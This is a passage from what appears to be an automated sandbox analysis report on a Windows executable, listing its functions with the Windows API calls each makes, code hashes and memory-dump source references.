                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5ff55985f0d79b0cf99ef6a0ef0ae12f56fe6c83aec1de8438bfb9543cdeefde
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b0f03f73917aa0242672cad5e2a3d57b897b97096b21a66ee5a5e8eec82a5f33
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BB519670E006089FDB10FF61DC51AEEB7B9EF45305F50857BE804A7292DB7CAA49CA58
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0049772C Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 97COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004242D4: SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                                                                                                                                                                                                                                                                                                                  • ShowWindow.USER32(?,00000005,00000000,00497991,?,?,00000000), ref: 00497762
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042D8D4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8E7
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004072B0: SetCurrentDirectoryA.KERNEL32(00000000,?,0049778A,00000000,0049795D,?,?,00000005,00000000,00497991,?,?,00000000), ref: 004072BB
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042D45C: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D4EA,?,?,?,00000001,?,0045606A,00000000,004560D2), ref: 0042D491
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: DirectoryWindow$CurrentFileModuleNameShowSystemText
                                                                                                                                                                                                                                                                                                                                                                  • String ID: .dat$.msg$IMsg$Uninstall
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3312786188-1660910688
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9f64172403ddeb939d39a3f7df51289d5b6e9677db294260719396c464943470
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: bbf2e7f3574d42a9113524bdb42c94a944b0e97273f2a70b882bd080beededf8
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9f64172403ddeb939d39a3f7df51289d5b6e9677db294260719396c464943470
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E318F74A10214AFDB00EF65DC82D6E7BB5EB89318B51847AF800AB392D739BD01CB58
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0042EAB8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(user32.dll,ShutdownBlockReasonCreate), ref: 0042EAEA
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EAF0
                                                                                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000FFF,00000000,user32.dll,ShutdownBlockReasonCreate), ref: 0042EB19
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressByteCharHandleModuleMultiProcWide
                                                                                                                                                                                                                                                                                                                                                                  • String ID: ShutdownBlockReasonCreate$user32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 828529508-2866557904
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9534e904a59d8297daeb25b9d7825c0fbb6ed839ef6a9198d5c62e06eb12a6a6
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: f5c55ae169209784706469d1b6e96428d25835975ad7b3a5622eb1d8c2489c6d
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9534e904a59d8297daeb25b9d7825c0fbb6ed839ef6a9198d5c62e06eb12a6a6
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2DF022E078062136E620E2BFACC3F6B498C8FA0725F040436F009EA2C2E92C9900422E
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00457E34 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00457E64
                                                                                                                                                                                                                                                                                                                                                                  • GetExitCodeProcess.KERNEL32(?,00498116), ref: 00457E85
                                                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,00457EB8,?,?,004586D3,00000000,00000000), ref: 00457EAB
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: CloseCodeExitHandleMultipleObjectsProcessWait
                                                                                                                                                                                                                                                                                                                                                                  • String ID: GetExitCodeProcess$MsgWaitForMultipleObjects
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 2573145106-3235461205
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 575e6b60f34cbf4eff7e6cad29998e42f3eca010a17ab32e5b4d53f7e3c6a35f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6a931132ee958b8202ab537f65b64b7fb4871f4dbf11571726e28c2ddef09419
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 575e6b60f34cbf4eff7e6cad29998e42f3eca010a17ab32e5b4d53f7e3c6a35f
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1101A735604704AFDB11EB999D43A1E77A8DB49711F5004B6FC10E73D3D63C9D048618
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0042DE54 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32registrylibraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • RegDeleteKeyA.ADVAPI32(00000000,00000000), ref: 0042DE60
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(advapi32.dll,RegDeleteKeyExA,?,00000000,0042DFFB,00000000,0042E013,?,?,?,?,00000006,?,00000000,0049722D), ref: 0042DE7B
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042DE81
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressDeleteHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                                  • String ID: RegDeleteKeyExA$advapi32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 588496660-1846899949
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b3fd006ce80945564c373db3d4c15d4b9ae9915c211241a5f5ab6bd40b9fa3cc
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 51feda2b41882886fdb541a0ee71ee95ad591444612597d61ea777cd3c773b46
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b3fd006ce80945564c373db3d4c15d4b9ae9915c211241a5f5ab6bd40b9fa3cc
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3EE06DB1B41B30AAD72032A57C8AB932629DB75326F658537F005AE1D183FC2C50CE9D
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0042EA2C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,00000004,00499934,00457029,004573CC,00456F80,00000000,00000B06,00000000,00000000,00000001,00000000,00000002,00000000,00480D8E), ref: 0042EA45
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042EA4B
                                                                                                                                                                                                                                                                                                                                                                  • InterlockedExchange.KERNEL32(0049B668,00000001), ref: 0042EA5C
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042E9BC: GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA80,00000004,00499934,00457029,004573CC,00456F80,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9D2
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042E9BC: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9D8
                                                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0042E9BC: InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9E9
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressExchangeHandleInterlockedModuleProc
                                                                                                                                                                                                                                                                                                                                                                  • String ID: ChangeWindowMessageFilterEx$user32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3478007392-2676053874
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 9ccf8f9e54757510606bb25a422eb68c08f41a26e1a59b42fb2ca8dfb600a1eb
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 2c8c4e1fda890c3dedf4e0e73620de090a3a9d5666271f16a874a7bcdd66483b
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9ccf8f9e54757510606bb25a422eb68c08f41a26e1a59b42fb2ca8dfb600a1eb
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 52E092A1741720EAEA10B7B67CC6F9A2668E714729F54403BF100A51E1C3BD1C80CE9E
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 0042E9BC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 20libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,0042EA80,00000004,00499934,00457029,004573CC,00456F80,00000000,00000B06,00000000,00000000,00000001,00000000,00000002), ref: 0042E9D2
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0042E9D8
                                                                                                                                                                                                                                                                                                                                                                  • InterlockedExchange.KERNEL32(0049B660,00000001), ref: 0042E9E9
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressExchangeHandleInterlockedModuleProc
                                                                                                                                                                                                                                                                                                                                                                  • String ID: ChangeWindowMessageFilter$user32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3478007392-2498399450
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 146a10820ef34488daac75dfe4d724224e06ebd26babe4e4026f7d79cef4ffdd
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 5ef4959e42d5312267b3952f4de6be483a2b5690063b138e9708ef51bd19b1c3
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 146a10820ef34488daac75dfe4d724224e06ebd26babe4e4026f7d79cef4ffdd
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A3E0ECB1741314EADA106B62BECBF5A2558E724B15F54043BF101751F2C7BD2C80C95E
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00477AB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderthreadCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 00477AB8
                                                                                                                                                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477BAF,0049C0A4,00000000), ref: 00477ACB
                                                                                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477AD1
                                                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: AddressHandleModuleProcProcessThreadWindow
                                                                                                                                                                                                                                                                                                                                                                  • String ID: AllowSetForegroundWindow$user32.dll
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 1782028327-3855017861
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: d70e071254100eb7aa9f5292160c81c93b9f44586e3d01c745e65432168752a4
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 8233eca9c26ae86130ab8a2651ceb45e7b9436c82c984da63702dcb6f06a18e2
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d70e071254100eb7aa9f5292160c81c93b9f44586e3d01c745e65432168752a4
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 27D0A7A0208300A6ED10F3F14C47E6F224C8D847587A4C43B7404E3182CABCE900993C
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00416C3C Relevance: 7.6, APIs: 5, Instructions: 104COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • BeginPaint.USER32(00000000,?), ref: 00416C62
                                                                                                                                                                                                                                                                                                                                                                  • SaveDC.GDI32(?), ref: 00416C93
                                                                                                                                                                                                                                                                                                                                                                  • ExcludeClipRect.GDI32(?,?,?,?,?,?,00000000,00416D55), ref: 00416CF4
                                                                                                                                                                                                                                                                                                                                                                  • RestoreDC.GDI32(?,?), ref: 00416D1B
                                                                                                                                                                                                                                                                                                                                                                  • EndPaint.USER32(00000000,?,00416D5C,00000000,00416D55), ref: 00416D4F
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID: Paint$BeginClipExcludeRectRestoreSave
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID: 3808407030-0
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: fff015b19b690dcf37e11bf8aa5ec5ea438a56c4f54cc106c2c54c23c1b0a68c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: c70ebf24aed337d2f43398dc79d2f74fb7d9fd2825851e0a0ce007a429ecfdc3
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fff015b19b690dcf37e11bf8aa5ec5ea438a56c4f54cc106c2c54c23c1b0a68c
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D7413C70A04204AFDB04DB99D985FAE77F9EB48304F1640AEE4059B362D778ED85CB58
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 00414810 Relevance: 7.6, APIs: 5, Instructions: 102COMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4628933385.000000000049A000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630749455.000000000049B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4630958388.00000000004AB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_18_2_400000_1EB9.jbxd
                                                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 26890b3473d1de9ad500ea3210d514958385b88118080daeb4b5d2349ec22244
                                                                                                                                                                                                                                                                                                                                                                  • Instruction ID: fc599d946787c0506e623d191f8eefd10b4a308858d20a9272ac2d3790a9447e
                                                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 26890b3473d1de9ad500ea3210d514958385b88118080daeb4b5d2349ec22244
                                                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A1314F746047449FC320EF69C984BABB7E8AF89314F04891EF9D9C3752C638EC858B19
                                                                                                                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                                                                                  Function 004297DC Relevance: 7.6, APIs: 5, Instructions: 83windowCOMMON
                                                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429818
                                                                                                                                                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,000000BB,?,00000000), ref: 00429847
                                                                                                                                                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 00429863
                                                                                                                                                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,000000B1,00000000,00000000), ref: 0042988E
                                                                                                                                                                                                                                                                                                                                                                  • SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 004298AC
                                                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                  • Source File: 00000012.00000002.4626715845.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4626209866.0000000000400000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                  • Associated: 00000012.00000002.4627393514.0000000000499000.00000004.00000001.01000000.0000000C.sdmpDownload File
